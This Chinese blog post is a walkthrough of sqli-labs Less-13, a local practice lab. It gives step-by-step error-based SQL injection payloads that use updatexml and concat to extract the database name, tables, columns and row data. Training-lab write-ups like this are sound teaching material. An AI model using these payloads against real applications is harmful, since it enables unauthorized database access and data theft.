目 录CONTENT

文章目录

sqli-labs系列——Less-13

CZ
CZ
2023-06-12 / 0 评论 / 0 点赞 / 272 阅读 / 2441 字 / 正在检测是否收录...
温馨提示:
本文最后更新于 2024-04-24,若内容或图片失效,请留言反馈。部分素材来自网络,若不小心影响到您的利益,请联系我们删除。

摘要

本次对话是关于sqli-labs-master中的Less-13注入漏洞的实验过程。通过构造payload,我们成功地获取到了数据库的名称、表名、列名以及相应的数据。在操作过程中,我们使用了单引号的报错注入,并且利用updatexml函数来获取报错信息。同时,我们还介绍了一些优化注入语句的方法,例如使用order by进行排序,使用concat_ws函数拼接字段,以及使用union语句获取更多信息。

前言

本题的做法跟之前某题比较类似,它是单引号的报错注入

前期准备

开启phpstudy,开启apache服务以及mysql服务

图片-1686619451321

实验环节

浏览器访问Less-13

http://127.0.0.1/sqli-labs-master/Less-13/

图片-1686534206741

判断是否存在注入

?id=1' and 1=1 -- xz
#页面报错说明存在注入

图片-1686620066087

判断库名

')and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- xz
#可得出我们的库名是security

图片-1686534387024

判断表名

')and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)-- xz
#说明我们的表名是emails

图片-1686534737033!

判断列名

')and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)-- xz
#说明我们的列名是id

图片-1686534522544

')and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- xz
#说明我们emails下的id列的数据是1

图片-1686534606033

0

评论区